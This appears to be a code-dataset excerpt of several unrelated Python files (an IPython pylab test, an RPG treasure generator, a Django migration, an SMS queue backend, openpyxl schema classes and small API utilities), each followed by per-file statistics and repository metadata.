runner.run_source(source)
out = self.out.getvalue()
#out = ''
# this output contains nasty \r\n lineends, and the initial ipython
# banner. clean it up for comparison, removing lines of whitespace
output_l = [l for l in output.splitlines() if l and not l.isspace()]
out_l = [l for l in out.splitlines() if l and not l.isspace()]
mismatch = 0
if len(output_l) != len(out_l):
message = ("Mismatch in number of lines\n\n"
"Expected:\n"
"~~~~~~~~~\n"
"%s\n\n"
"Got:\n"
"~~~~~~~~~\n"
"%s"
) % ("\n".join(output_l), "\n".join(out_l))
self.fail(message)
for n in range(len(output_l)):
# Do a line-by-line comparison
ol1 = output_l[n].strip()
ol2 = out_l[n].strip()
if not re.match(ol1,ol2):
mismatch += 1
if VERBOSE:
print '<<< line %s does not match:' % n
print repr(ol1)
print repr(ol2)
print '>>>'
self.assert_(mismatch==0,'Number of mismatched lines: %s' %
mismatch)
@decorators.skipif_not_matplotlib
@decorators.skipif(pylab_not_importable, "Likely a run without X.")
def test_pylab_import_all_enabled(self):
"Verify that plot is available when pylab_import_all = True"
source = """
from IPython.config.application import Application
app = Application.instance()
app.pylab_import_all = True
pylab
ip=get_ipython()
'plot' in ip.user_ns
"""
output = """
In \[1\]: from IPython\.config\.application import Application
In \[2\]: app = Application\.instance\(\)
In \[3\]: app\.pylab_import_all = True
In \[4\]: pylab
^Welcome to pylab, a matplotlib-based Python environment
For more information, type 'help\(pylab\)'\.
In \[5\]: ip=get_ipython\(\)
In \[6\]: \'plot\' in ip\.user_ns
Out\[6\]: True
"""
runner = irunner.IPythonRunner(out=self.out)
self._test_runner(runner,source,output)
@decorators.skipif_not_matplotlib
@decorators.skipif(pylab_not_importable, "Likely a run without X.")
def test_pylab_import_all_disabled(self):
"Verify that plot is not available when pylab_import_all = False"
source = """
from IPython.config.application import Application
app = Application.instance()
app.pylab_import_all = False
pylab
ip=get_ipython()
'plot' in ip.user_ns
"""
output = """
In \[1\]: from IPython\.config\.application import Application
In \[2\]: app = Application\.instance\(\)
In \[3\]: app\.pylab_import_all = False
In \[4\]: pylab
^Welcome to pylab, a matplotlib-based Python environment
For more information, type 'help\(pylab\)'\.
In \[5\]: ip=get_ipython\(\)
In \[6\]: \'plot\' in ip\.user_ns
Out\[6\]: False
"""
runner = irunner.IPythonRunner(out=self.out)
self._test_runner(runner,source,output)
| 32.689076 | 87 | 0.608226 | 501 | 3,890 | 4.608782 | 0.289421 | 0.042876 | 0.054569 | 0.048506 | 0.522304 | 0.466869 | 0.466869 | 0.443482 | 0.443482 | 0.443482 | 0 | 0.008084 | 0.268638 | 3,890 | 118 | 88 | 32.966102 | 0.803515 | 0.075578 | 0 | 0.446809 | 0 | 0 | 0.392017 | 0.072684 | 0 | 0 | 0 | 0 | 0.010638 | 0 | null | null | 0 | 0.234043 | null | null | 0.042553 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1be2fe74c868aa22cedb699484c807fd62b32107 | 14,174 | py | Python | Dungeoneer/Treasure.py | jameslemon81/Dungeoneer | 8a2a1bfea06ae09f1898583999bf449c82ba4ce9 | [
"BSD-3-Clause"
] | 12 | 2015-01-29T17:15:46.000Z | 2022-02-23T05:58:49.000Z | Dungeoneer/Treasure.py | jameslemon81/Dungeoneer | 8a2a1bfea06ae09f1898583999bf449c82ba4ce9 | [
"BSD-3-Clause"
] | null | null | null | Dungeoneer/Treasure.py | jameslemon81/Dungeoneer | 8a2a1bfea06ae09f1898583999bf449c82ba4ce9 | [
"BSD-3-Clause"
] | 8 | 2016-07-04T18:09:50.000Z | 2022-02-23T05:58:48.000Z | # Basic Fantasy RPG Dungeoneer Suite
# Copyright 2007-2012 Chris Gonnerman
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# Neither the name of the author nor the names of any contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# AUTHOR OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
###############################################################################
# Treasure.py -- generate treasures for Basic Fantasy RPG
###############################################################################
import Gems, Art, Coins, Magic, Unknown
import Dice
import string
def combine(lst):
lst.sort()
hits = 1
while hits:
hits = 0
for i in range(len(lst) - 1):
if lst[i] is not None and lst[i+1] is not None:
if lst[i].cat == lst[i+1].cat \
and lst[i].name == lst[i+1].name \
and lst[i].value == lst[i+1].value:
lst[i].qty += lst[i+1].qty
lst[i+1] = None
hits += 1
if hits:
lst = filter(lambda x: x is not None, lst)
return lst
def _gen_coins(argtup):
kind, n, s, b, mul = argtup
return [ Coins.Coin(kind, (Dice.D(n, s, b) * mul)) ]
def _gen_gems(argtup):
n, s, b, mul = argtup
lst = []
qty = Dice.D(n, s, b) * mul
for i in range(qty):
lst = lst + [ Gems.Gem() ]
return lst
def _gen_art(argtup):
n, s, b, mul = argtup
lst = []
qty = Dice.D(n, s, b) * mul
for i in range(qty):
lst = lst + [ Art.Art() ]
return lst
def __gen_magic(argtup):
kind, n, s, b, mul = argtup
lst = []
qty = Dice.D(n, s, b) * mul
for i in range(qty):
lst = lst + [ Magic.Magic(kind) ]
return lst
def _gen_magic(argtup):
if type(argtup) is type([]):
lst = []
for i in argtup:
lst = lst + __gen_magic(i)
return lst
else:
return __gen_magic(argtup)
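# Each table entry below is a (percent_chance, generator, args) tuple. The dice
# arguments (n, s, b, mul) mean: roll Dice.D(n, s, b) and multiply the result
# by mul; coin and magic entries carry an extra leading "kind" string.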
_treasure_table = {
# lair treasure
'A': [
(50, _gen_coins, ("cp", 5, 6, 0, 100)),
(60, _gen_coins, ("sp", 5, 6, 0, 100)),
(40, _gen_coins, ("ep", 5, 4, 0, 100)),
(70, _gen_coins, ("gp", 10, 6, 0, 100)),
(50, _gen_coins, ("pp", 1, 10, 0, 100)),
(50, _gen_gems, (6, 6, 0, 1)),
(50, _gen_art, (6, 6, 0, 1)),
(30, _gen_magic, ("Any", 0, 0, 3, 1)),
],
'B': [
(75, _gen_coins, ("cp", 5, 10, 0, 100)),
(50, _gen_coins, ("sp", 5, 6, 0, 100)),
(50, _gen_coins, ("ep", 5, 4, 0, 100)),
(50, _gen_coins, ("gp", 3, 6, 0, 100)),
(25, _gen_gems, (1, 6, 0, 1)),
(25, _gen_art, (1, 6, 0, 1)),
(10, _gen_magic, ("AW", 0, 0, 1, 1)),
],
'C': [
(60, _gen_coins, ("cp", 6, 6, 0, 100)),
(60, _gen_coins, ("sp", 5, 4, 0, 100)),
(30, _gen_coins, ("ep", 2, 6, 0, 100)),
(25, _gen_gems, (1, 4, 0, 1)),
(25, _gen_art, (1, 4, 0, 1)),
(15, _gen_magic, ("Any", 1, 2, 0, 1)),
],
'D': [
(30, _gen_coins, ("cp", 4, 6, 0, 100)),
(45, _gen_coins, ("sp", 6, 6, 0, 100)),
(90, _gen_coins, ("gp", 5, 8, 0, 100)),
(30, _gen_gems, (1, 8, 0, 1)),
(30, _gen_art, (1, 8, 0, 1)),
(20, _gen_magic, [
("Any", 1, 2, 0, 1),
("Potion", 0, 0, 1, 1),
]
),
],
'E': [
(30, _gen_coins, ("cp", 2, 8, 0, 100)),
(60, _gen_coins, ("sp", 6, 10, 0, 100)),
(50, _gen_coins, ("ep", 3, 8, 0, 100)),
(50, _gen_coins, ("gp", 4, 10, 0, 100)),
(10, _gen_gems, (1, 10, 0, 1)),
(10, _gen_art, (1, 10, 0, 1)),
(30, _gen_magic, [
("Any", 1, 4, 0, 1),
("Scroll", 0, 0, 1, 1),
]
),
],
'F': [
(40, _gen_coins, ("sp", 3, 8, 0, 100)),
(50, _gen_coins, ("ep", 4, 8, 0, 100)),
(85, _gen_coins, ("gp", 6, 10, 0, 100)),
(70, _gen_coins, ("pp", 2, 8, 0, 100)),
(20, _gen_gems, (2, 12, 0, 1)),
(20, _gen_art, (1, 12, 0, 1)),
(35, _gen_magic, [
("Non-Weapon", 1, 4, 0, 1),
("Scroll", 0, 0, 1, 1),
("Potion", 0, 0, 1, 1),
]
),
],
'G': [
(90, _gen_coins, ("gp", 4, 6, 0, 1000)),
(75, _gen_coins, ("pp", 5, 8, 0, 100)),
(25, _gen_gems, (3, 6, 0, 1)),
(25, _gen_art, (1, 10, 0, 1)),
(50, _gen_magic, [
("Any", 1, 4, 0, 1),
("Scroll", 0, 0, 1, 1),
]
),
],
'H': [
(75, _gen_coins, ("cp", 8, 10, 0, 100)),
(75, _gen_coins, ("sp", 6, 10, 0, 1000)),
(75, _gen_coins, ("ep", 3, 10, 0, 1000)),
(75, _gen_coins, ("gp", 5, 8, 0, 1000)),
(75, _gen_coins, ("pp", 9, 8, 0, 100)),
(50, _gen_gems, ( 1, 100, 0, 1)),
(50, _gen_art, (10, 4, 0, 1)),
(20, _gen_magic, [
("Any", 1, 4, 0, 1),
("Scroll", 0, 0, 1, 1),
("Potion", 0, 0, 1, 1),
]
),
],
'I': [
(80, _gen_coins, ("pp", 3, 10, 0, 100)),
(50, _gen_gems, (2, 6, 0, 1)),
(50, _gen_art, (2, 6, 0, 1)),
(15, _gen_magic, ("Any", 0, 0, 1, 1)),
],
'J': [
(45, _gen_coins, ("cp", 3, 8, 0, 100)),
(45, _gen_coins, ("sp", 1, 8, 0, 100)),
],
'K': [
(90, _gen_coins, ("cp", 2, 10, 0, 100)),
(35, _gen_coins, ("sp", 1, 8, 0, 100)),
],
'L': [
(50, _gen_gems, (1, 4, 0, 1)),
],
'M': [
(90, _gen_coins, ("gp", 4, 10, 0, 100)),
(90, _gen_coins, ("pp", 2, 8, 0, 1000)),
],
'N': [
(40, _gen_magic, ("Potion", 2, 4, 0, 1)),
],
'O': [
(50, _gen_magic, ("Scroll", 1, 4, 0, 1)),
],
# personal treasure
'P': [
(100, _gen_coins, ("cp", 3, 8, 0, 1)),
],
'Q': [
(100, _gen_coins, ("sp", 3, 6, 0, 1)),
],
'R': [
(100, _gen_coins, ("ep", 2, 6, 0, 1)),
],
'S': [
(100, _gen_coins, ("gp", 2, 4, 0, 1)),
],
'T': [
(100, _gen_coins, ("pp", 1, 6, 0, 1)),
],
'U': [
( 50, _gen_coins, ("cp", 1, 20, 0, 1)),
( 50, _gen_coins, ("sp", 1, 20, 0, 1)),
( 25, _gen_coins, ("gp", 1, 20, 0, 1)),
( 5, _gen_gems, (1, 4, 0, 1)),
( 5, _gen_art, (1, 4, 0, 1)),
( 2, _gen_magic, ("Any", 0, 0, 1, 1)),
],
'V': [
( 25, _gen_coins, ("sp", 1, 20, 0, 1)),
( 25, _gen_coins, ("ep", 1, 20, 0, 1)),
( 50, _gen_coins, ("gp", 1, 20, 0, 1)),
( 25, _gen_coins, ("pp", 1, 20, 0, 1)),
( 10, _gen_gems, (1, 4, 0, 1)),
( 10, _gen_art, (1, 4, 0, 1)),
( 5, _gen_magic, ("Any", 0, 0, 1, 1)),
],
'U1': [
( 75, _gen_coins, ("cp", 1, 8, 0, 100)),
( 50, _gen_coins, ("sp", 1, 6, 0, 100)),
( 25, _gen_coins, ("ep", 1, 4, 0, 100)),
( 7, _gen_coins, ("gp", 1, 4, 0, 100)),
( 1, _gen_coins, ("pp", 1, 4, 0, 100)),
( 7, _gen_gems, (1, 4, 0, 1)),
( 3, _gen_art, (1, 4, 0, 1)),
( 2, _gen_magic, ("Any", 0, 0, 1, 1)),
],
'U2': [
( 50, _gen_coins, ("cp", 1, 10, 0, 100)),
( 50, _gen_coins, ("sp", 1, 8, 0, 100)),
( 25, _gen_coins, ("ep", 1, 6, 0, 100)),
( 20, _gen_coins, ("gp", 1, 6, 0, 100)),
( 2, _gen_coins, ("pp", 1, 4, 0, 100)),
( 10, _gen_gems, (1, 6, 0, 1)),
( 7, _gen_art, (1, 4, 0, 1)),
( 5, _gen_magic, ("Any", 0, 0, 1, 1)),
],
'U3': [
( 30, _gen_coins, ("cp", 2, 6, 0, 100)),
( 50, _gen_coins, ("sp", 1, 10, 0, 100)),
( 25, _gen_coins, ("ep", 1, 8, 0, 100)),
( 50, _gen_coins, ("gp", 1, 6, 0, 100)),
( 4, _gen_coins, ("pp", 1, 4, 0, 100)),
( 15, _gen_gems, (1, 6, 0, 1)),
( 7, _gen_art, (1, 6, 0, 1)),
( 8, _gen_magic, ("Any", 0, 0, 1, 1)),
],
'U45': [
( 20, _gen_coins, ("cp", 3, 6, 0, 100)),
( 50, _gen_coins, ("sp", 2, 6, 0, 100)),
( 25, _gen_coins, ("ep", 1, 10, 0, 100)),
( 50, _gen_coins, ("gp", 2, 6, 0, 100)),
( 8, _gen_coins, ("pp", 1, 4, 0, 100)),
( 20, _gen_gems, (1, 8, 0, 1)),
( 10, _gen_art, (1, 6, 0, 1)),
( 12, _gen_magic, ("Any", 0, 0, 1, 1)),
],
'U67': [
( 15, _gen_coins, ("cp", 4, 6, 0, 100)),
( 50, _gen_coins, ("sp", 3, 6, 0, 100)),
( 25, _gen_coins, ("ep", 1, 12, 0, 100)),
( 70, _gen_coins, ("gp", 2, 8, 0, 100)),
( 15, _gen_coins, ("pp", 1, 4, 0, 100)),
( 30, _gen_gems, (1, 8, 0, 1)),
( 15, _gen_art, (1, 6, 0, 1)),
( 16, _gen_magic, ("Any", 0, 0, 1, 1)),
],
'U8': [
( 10, _gen_coins, ("cp", 5, 6, 0, 100)),
( 50, _gen_coins, ("sp", 5, 6, 0, 100)),
( 25, _gen_coins, ("ep", 2, 8, 0, 100)),
( 75, _gen_coins, ("gp", 4, 6, 0, 100)),
( 30, _gen_coins, ("pp", 1, 4, 0, 100)),
( 40, _gen_gems, (1, 8, 0, 1)),
( 30, _gen_art, (1, 8, 0, 1)),
( 20, _gen_magic, ("Any", 0, 0, 1, 1)),
],
# coinage
'cp': [
(100, _gen_coins, ("cp", 0, 0, 1, 1)),
],
'sp': [
(100, _gen_coins, ("sp", 0, 0, 1, 1)),
],
'ep': [
(100, _gen_coins, ("ep", 0, 0, 1, 1)),
],
'gp': [
(100, _gen_coins, ("gp", 0, 0, 1, 1)),
],
'pp': [
(100, _gen_coins, ("pp", 0, 0, 1, 1)),
],
# magic classes
'MAGIC': [ (100, _gen_magic, ("Any", 0, 0, 1, 1)), ],
'POTION': [ (100, _gen_magic, ("Potion", 0, 0, 1, 1)), ],
'SCROLL': [ (100, _gen_magic, ("Scroll", 0, 0, 1, 1)), ],
'RING': [ (100, _gen_magic, ("Ring", 0, 0, 1, 1)), ],
'WSR': [ (100, _gen_magic, ("WSR", 0, 0, 1, 1)), ],
'MISC': [ (100, _gen_magic, ("Misc", 0, 0, 1, 1)), ],
'ARMOR': [ (100, _gen_magic, ("Armor", 0, 0, 1, 1)), ],
'WEAPON': [ (100, _gen_magic, ("Weapon", 0, 0, 1, 1)), ],
}
_treasure_table['U4'] = _treasure_table['U45']
_treasure_table['U5'] = _treasure_table['U45']
_treasure_table['U6'] = _treasure_table['U67']
_treasure_table['U7'] = _treasure_table['U67']
def Types():
types = _treasure_table.keys()
ones = filter(lambda x: len(x) == 1, types)
mults = filter(lambda x: len(x) > 1, types)
ones.sort()
mults.sort()
return ones + mults
def Treasure(typ):
tr = []
try:
tbl = _treasure_table[string.upper(typ)]
for i in tbl:
if Dice.D(1, 100, 0) <= i[0]:
tr = tr + i[1](i[2])
except:
tr = [ Unknown.Unknown(typ) ]
return tr
def Factory(args):
types = []
tr = []
mult = 1
for i in args:
if type(i) is tuple:
i = Dice.D(*i)
try:
nmult = int(i)
mult = nmult
types.append("%d" % mult)
continue
except:
pass
types.append(i + ",")
for n in range(mult):
tr += Treasure(i)
types = string.join(types, " ")
if types[-1] == ',':
types = types[:-1]
return (types.upper(), combine(tr))
if __name__ == "__main__":
import sys
if len(sys.argv) < 2:
print "Usage: Treasure.py treasuretype [ treasuretype ... ]"
sys.exit(0)
types, tr = Factory(sys.argv[1:])
print "Treasure Type " + string.upper(types)
vtot = 0.0
ocat = ''
qty_len = 1
for t in tr:
qty_len = max(len(str(t.qty)), qty_len)
qty_fmt = "%" + str(qty_len) + "d"
for t in tr:
if t.cat != ocat:
print t.cat
ocat = t.cat
if t.value != 0:
print " ", qty_fmt % t.qty, t.name, t.value, "GP ea.", \
t.value * t.qty, "GP total"
else:
print " ", qty_fmt % t.qty, t.name
for i in t.desc:
print " ", i
vtot = vtot + (t.qty * t.value)
print "----- Total Value", vtot, "GP\n"
# end of script.
| 32.734411 | 79 | 0.417172 | 1,945 | 14,174 | 2.862211 | 0.143959 | 0.122148 | 0.016167 | 0.021556 | 0.447638 | 0.397341 | 0.288126 | 0.146937 | 0.130771 | 0.126639 | 0 | 0.129187 | 0.380697 | 14,174 | 432 | 80 | 32.810185 | 0.505013 | 0.113729 | 0 | 0.250704 | 0 | 0 | 0.044554 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.002817 | 0.011268 | null | null | 0.019718 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1be38ec637c07219a45f7c7ba15326a16a343d58 | 396 | py | Python | T2API/migrations/0008_product_weight.py | hackhb18-T2/api | c42be466492d07d6451ff3145985cd8cc0927257 | [
"Apache-2.0"
] | null | null | null | T2API/migrations/0008_product_weight.py | hackhb18-T2/api | c42be466492d07d6451ff3145985cd8cc0927257 | [
"Apache-2.0"
] | null | null | null | T2API/migrations/0008_product_weight.py | hackhb18-T2/api | c42be466492d07d6451ff3145985cd8cc0927257 | [
"Apache-2.0"
] | null | null | null | # Generated by Django 2.0.2 on 2018-02-17 10:50
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('T2API', '0007_apiuser_deviceuser'),
]
operations = [
migrations.AddField(
model_name='product',
name='weight',
field=models.IntegerField(default=None, null=True),
),
]
| 20.842105 | 63 | 0.60101 | 42 | 396 | 5.595238 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.070423 | 0.282828 | 396 | 18 | 64 | 22 | 0.757042 | 0.113636 | 0 | 0 | 1 | 0 | 0.117479 | 0.065903 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.083333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1be5b77cc2bbea8d65329992b137d52e24f4e227 | 441 | py | Python | changes/api/build_coverage.py | vault-the/changes | 37e23c3141b75e4785cf398d015e3dbca41bdd56 | [
"Apache-2.0"
] | 443 | 2015-01-03T16:28:39.000Z | 2021-04-26T16:39:46.000Z | changes/api/build_coverage.py | vault-the/changes | 37e23c3141b75e4785cf398d015e3dbca41bdd56 | [
"Apache-2.0"
] | 12 | 2015-07-30T19:07:16.000Z | 2016-11-07T23:11:21.000Z | changes/api/build_coverage.py | vault-the/changes | 37e23c3141b75e4785cf398d015e3dbca41bdd56 | [
"Apache-2.0"
] | 47 | 2015-01-09T10:04:00.000Z | 2020-11-18T17:58:19.000Z | from changes.api.base import APIView
from changes.lib.coverage import get_coverage_by_build_id, merged_coverage_data
from changes.models.build import Build
class BuildTestCoverageAPIView(APIView):
def get(self, build_id):
build = Build.query.get(build_id)
if build is None:
return '', 404
coverage = merged_coverage_data(get_coverage_by_build_id(build.id))
return self.respond(coverage)
| 25.941176 | 79 | 0.730159 | 60 | 441 | 5.133333 | 0.433333 | 0.113636 | 0.084416 | 0.116883 | 0.12987 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008475 | 0.197279 | 441 | 16 | 80 | 27.5625 | 0.861582 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0.3 | 0 | 0.7 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
1beb0ef06d9c6f7de745f499f7af1a9f705e4a88 | 929 | py | Python | sendsms/backends/rq.py | this-is-the-bard/django-sendsms | 8944b7d276f91b019ad6aa2e7e29324fa107fa01 | [
"MIT"
] | null | null | null | sendsms/backends/rq.py | this-is-the-bard/django-sendsms | 8944b7d276f91b019ad6aa2e7e29324fa107fa01 | [
"MIT"
] | null | null | null | sendsms/backends/rq.py | this-is-the-bard/django-sendsms | 8944b7d276f91b019ad6aa2e7e29324fa107fa01 | [
"MIT"
] | null | null | null | """ python-rq based backend
This backend will send your messages asynchronously with python-rq.
Before using this backend, make sure that django-rq is installed and
configured.
Usage
-----
In settings.py
SENDSMS_BACKEND = 'sendsms.backends.rq.SmsBackend'
RQ_SENDSMS_BACKEND = 'actual.backend.to.use.SmsBackend'
"""
from sendsms.api import get_connection
from sendsms.backends.base import BaseSmsBackend
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django_rq import job
RQ_SENDSMS_BACKEND = getattr(settings, 'RQ_SENDSMS_BACKEND', None)
if not RQ_SENDSMS_BACKEND:
raise ImproperlyConfigured('Set RQ_SENDSMS_BACKEND')
@job
def send_messages(messages):
connection = get_connection(RQ_SENDSMS_BACKEND)
connection.send_messages(messages)
class SmsBackend(BaseSmsBackend):
def send_messages(self, messages):
send_messages.delay(messages)
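# Usage sketch (assumes django-rq is configured with a running worker and that
# the package's SmsMessage helper is available -- both names are assumptions):
# from sendsms.message import SmsMessage
# SmsMessage(body='ping', from_phone='+15550100', to=['+15550199']).send()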
| 22.119048 | 68 | 0.787944 | 120 | 929 | 5.933333 | 0.441667 | 0.13764 | 0.134831 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.137783 | 929 | 41 | 69 | 22.658537 | 0.888889 | 0.344456 | 0 | 0 | 0 | 0 | 0.066778 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.133333 | false | 0 | 0.333333 | 0 | 0.533333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
1bed3f78be12183f03bd98f78582fb16d8457339 | 2,435 | py | Python | venv/Lib/site-packages/openpyxl/worksheet/errors.py | ajayiagbebaku/NFL-Model | afcc67a85ca7138c58c3334d45988ada2da158ed | [
"MIT"
] | 5,079 | 2015-01-01T03:39:46.000Z | 2022-03-31T07:38:22.000Z | venv/Lib/site-packages/openpyxl/worksheet/errors.py | ajayiagbebaku/NFL-Model | afcc67a85ca7138c58c3334d45988ada2da158ed | [
"MIT"
] | 1,623 | 2015-01-01T08:06:24.000Z | 2022-03-30T19:48:52.000Z | venv/Lib/site-packages/openpyxl/worksheet/errors.py | ajayiagbebaku/NFL-Model | afcc67a85ca7138c58c3334d45988ada2da158ed | [
"MIT"
] | 2,033 | 2015-01-04T07:18:02.000Z | 2022-03-28T19:55:47.000Z | #Autogenerated schema
from openpyxl.descriptors.serialisable import Serialisable
from openpyxl.descriptors import (
Typed,
String,
Bool,
Sequence,
)
from openpyxl.descriptors.excel import CellRange
class Extension(Serialisable):
tagname = "extension"
uri = String(allow_none=True)
def __init__(self,
uri=None,
):
self.uri = uri
class ExtensionList(Serialisable):
tagname = "extensionList"
# uses element group EG_ExtensionList
ext = Sequence(expected_type=Extension)
__elements__ = ('ext',)
def __init__(self,
ext=(),
):
self.ext = ext
class IgnoredError(Serialisable):
tagname = "ignoredError"
sqref = CellRange
evalError = Bool(allow_none=True)
twoDigitTextYear = Bool(allow_none=True)
numberStoredAsText = Bool(allow_none=True)
formula = Bool(allow_none=True)
formulaRange = Bool(allow_none=True)
unlockedFormula = Bool(allow_none=True)
emptyCellReference = Bool(allow_none=True)
listDataValidation = Bool(allow_none=True)
calculatedColumn = Bool(allow_none=True)
def __init__(self,
sqref=None,
evalError=False,
twoDigitTextYear=False,
numberStoredAsText=False,
formula=False,
formulaRange=False,
unlockedFormula=False,
emptyCellReference=False,
listDataValidation=False,
calculatedColumn=False,
):
self.sqref = sqref
self.evalError = evalError
self.twoDigitTextYear = twoDigitTextYear
self.numberStoredAsText = numberStoredAsText
self.formula = formula
self.formulaRange = formulaRange
self.unlockedFormula = unlockedFormula
self.emptyCellReference = emptyCellReference
self.listDataValidation = listDataValidation
self.calculatedColumn = calculatedColumn
class IgnoredErrors(Serialisable):
tagname = "ignoredErrors"
ignoredError = Sequence(expected_type=IgnoredError)
extLst = Typed(expected_type=ExtensionList, allow_none=True)
__elements__ = ('ignoredError', 'extLst')
def __init__(self,
ignoredError=(),
extLst=None,
):
self.ignoredError = ignoredError
self.extLst = extLst
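# Usage sketch (construction only; persisting these schema objects into a
# worksheet's XML is handled elsewhere in openpyxl):
# ie = IgnoredError(sqref="A1:B2", numberStoredAsText=True)
# errors = IgnoredErrors(ignoredError=[ie])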
| 25.904255 | 64 | 0.631622 | 202 | 2,435 | 7.420792 | 0.227723 | 0.066044 | 0.095397 | 0.102068 | 0.032021 | 0.032021 | 0 | 0 | 0 | 0 | 0 | 0 | 0.293635 | 2,435 | 93 | 65 | 26.182796 | 0.871512 | 0.022998 | 0 | 0.117647 | 1 | 0 | 0.02862 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.058824 | false | 0 | 0.044118 | 0 | 0.455882 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1beeb9bf708d482300442a926d31325bbdca0e33 | 619 | py | Python | SmartMove/SmartConnector/cpapi/utils.py | themichaelasher/SmartMove | 074c6e1a854fdfc21fb292e575a869719d56c5d5 | [
"Apache-2.0"
] | 24 | 2018-03-15T09:00:51.000Z | 2022-03-17T05:19:47.000Z | SmartMove/SmartConnector/cpapi/utils.py | themichaelasher/SmartMove | 074c6e1a854fdfc21fb292e575a869719d56c5d5 | [
"Apache-2.0"
] | 8 | 2020-01-20T15:44:42.000Z | 2021-10-18T05:39:04.000Z | SmartMove/SmartConnector/cpapi/utils.py | themichaelasher/SmartMove | 074c6e1a854fdfc21fb292e575a869719d56c5d5 | [
"Apache-2.0"
] | 22 | 2018-06-04T20:36:41.000Z | 2022-03-16T17:10:44.000Z | import json
import sys
def compatible_loads(json_data):
"""
Function json.loads in Python 3.0 - 3.5 can't handle bytes, so this function handles it.
:param json_data:
:return: unicode (str if it's python 3)
"""
if isinstance(json_data, bytes) and (3, 0) <= sys.version_info < (3, 6):
json_data = json_data.decode("utf-8")
return json.loads(json_data)
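# Example: bytes and text inputs decode to the same object, e.g.
# compatible_loads(b'{"a": 1}') == compatible_loads('{"a": 1}') == {'a': 1}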
def get_massage_from_io_error(error):
"""
:param error: IOError
:return: error message
"""
if sys.version_info >= (3, 0):
return error.strerror
else:
return error.message
| 24.76 | 92 | 0.610662 | 88 | 619 | 4.147727 | 0.488636 | 0.131507 | 0.071233 | 0.082192 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.026786 | 0.276252 | 619 | 24 | 93 | 25.791667 | 0.787946 | 0.297254 | 0 | 0 | 0 | 0 | 0.013587 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.181818 | false | 0 | 0.181818 | 0 | 0.636364 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
